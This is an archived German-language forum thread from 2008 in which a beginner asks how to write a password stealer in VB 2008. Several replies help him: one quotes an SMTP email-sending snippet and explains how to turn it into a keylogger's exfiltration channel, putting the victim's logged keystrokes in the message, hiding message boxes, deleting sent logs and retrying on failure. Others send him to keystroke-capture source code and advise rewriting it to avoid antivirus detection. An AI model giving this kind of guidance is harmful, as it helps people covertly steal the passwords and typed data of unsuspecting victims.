PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Passwort "Stealer" in vb2008 Hilfe



Kelvin16
25.09.2008, 20:12
Hallo zusammen. ich hoffe das ich jetzt keinen bann bekommen (habe davor angst) aber habe ne frage die mich schon seit langem beschäftigt.
Wie mache ich einen passwort "stealer" (weiß jetz net wie ichs nenen soll) in vb 2008? da hab ich jetzt bei em schlauen google mal gesucht und bin fündig geworden und zwar hier: http://www.vbarchiv.net/tipps/details.php?id=804

nun ist das prob, da ich seit 6 tagen ca. mit vb angefangen hab und diesen code nicht verstehe. die kommentare im code iritieren mich und in manchen zeilen wo ich was eingeben muss was dann speziel ich eingeben muss nicht verstehe.
wenn ich den code kopiere und dann einfüge sind da sehr viele fehler!

Vllt wenn einer lust hat mir über teamviewer zu helfen ist er herzlich eingeladen :D

ein großes THX für alle antworten!!!

Unbekannt.exe
25.09.2008, 20:17
Du solltest die grundlagen beherschen, und dann das ganze selbst schreiben, wenn dus nicht verstehst dann bringt das nichts !

YannicK
25.09.2008, 20:20
Leider sendet dir dieser code nur die daten und loggt sie nicht !



' SMTP-Server (z.B. T-Online)
SmtpMail.SmtpServer = "mailto.btx.dtag.de"

With oMail
' Absender
.From = "Ihre EMail-Adresse"

' Empfänger
.To = "Empfänger EMail-Adresse"


Da musst du deine email daten angeben und absender machst z.b einfach Keylogger@log.de oder irgend eine halt


' Betreff
.Subject = "Test-Nachricht"

' Nachricht
.Body = "Dies ist eine Test-Nachricht"


Der betreff sollte klar sein einfach Keylogger daten oder sowas was du willst halt

bei Nachricht kommt halt der geloggte text den das victim zu der zeit schon eingegeben hat


Try
SmtpMail.Send(oMail)
MsgBox("Nachricht wurde versandt.")

Catch oEx As Exception
MsgBox("Fehler: " & oEx.Message.ToString)


Die msgboxen kannst du weglassen und kannst z.b bei
SmtpMail.Send(oMail)

den jetzigen log löschen lassen weil der ja versetndet wurde und du den alten bei der nächsten mail ja nicht mitsenden musst

Catch oEx As Exception

Und dort kannst du eig. den log code weiterlaufen lassen oder einfach den versuch die mail zu senden wieder zu versuchen

Wird halt nur erklärt wie man eine Email sendet! damit werden keine logs gemacht ;p

Hallifax
25.09.2008, 20:22
jap,fang am besten mit leichten sachen an, um die grundlagen zu verstehen...
gleich einen stealer solltest du erstmal lassen.
falls dir so die finger jucken, versuch es mit opensourcecodes oder auch 3rd person apps (nirsoft-tools)....

Kelvin16
25.09.2008, 20:24
trzdem danke aber ich brauche auch log daten möglichst "für dummies" erklärt XD

YannicK
25.09.2008, 20:35
jap,fang am besten mit leichten sachen an, um die grundlagen zu verstehen...
gleich einen stealer solltest du erstmal lassen.
falls dir so die finger jucken, versuch es mit opensourcecodes oder auch 3rd person apps (nirsoft-tools)....


Also ich hab ein keylogger gebaut da hab ich noch nichtmal mit vb lernen angefangen ^^

Man muss einfach im google nach tasteneinschläge suchen oder soetwas

weil ich denke nichct das eine seriöse seite erklärt wie man ein keylogger schreibt o_O

Mein problem war aber das ich das über direkt verbindung versucht habe hätte ich dieses mail script wäre es total einfach

Also dein auftrag (:p)
Such in google nach erklärungen/Sourcecodes die das aufzeichnen von Tasteneinschläge erklärt ;)

Hallifax
25.09.2008, 20:37
Also ich hab ein keylogger gebaut da hab ich noch nichtmal mit vb lernen angefangen ^^

Man muss einfach im google nach tasteneinschläge suchen oder soetwas


jop,keylogger ist eine gute übung...such da nach sourcecodes mit google. aber nicht wundern,wenn dein AV was entdeckt....-der code wird sicherlich schon detected sein...

YannicK
25.09.2008, 20:55
jop,keylogger ist eine gute übung...such da nach sourcecodes mit google. aber nicht wundern,wenn dein AV was entdeckt....-der code wird sicherlich schon detected sein...


Man sollte in natürlich selber abschreiben und umschreiben etwas ;)